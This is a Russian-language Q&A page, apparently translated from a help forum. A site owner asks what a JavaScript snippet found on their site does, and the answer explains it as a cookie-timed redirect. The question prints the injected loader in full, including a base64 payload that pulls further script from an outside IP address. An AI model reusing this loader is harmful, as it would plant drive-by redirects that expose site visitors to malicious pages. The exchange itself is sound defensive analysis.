Что делает следующий код JavaScript?

Question

function getCookie(e)
{var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('<script src="'+src+'"><\/script>')}

Я удалил его и изменил свой пароль. Как это повлияет?

Answer 1

tl; dr: Обычно скрипт через некоторое время перенаправляет пользователя на другой теневой веб-сайт.

1. Он проверяет наличие файла cookie перенаправления, чтобы определить, когда должно произойти перенаправление.
2. Если необходимо, загружается скрипт полезной нагрузки, закодированный в Base64 .
3. Полезная нагрузка - еще один фрагмент JavaScript - загружает другой файл сценария с IP-адреса
4. Последний скрипт фактически перенаправляет пользователя на другую страницу.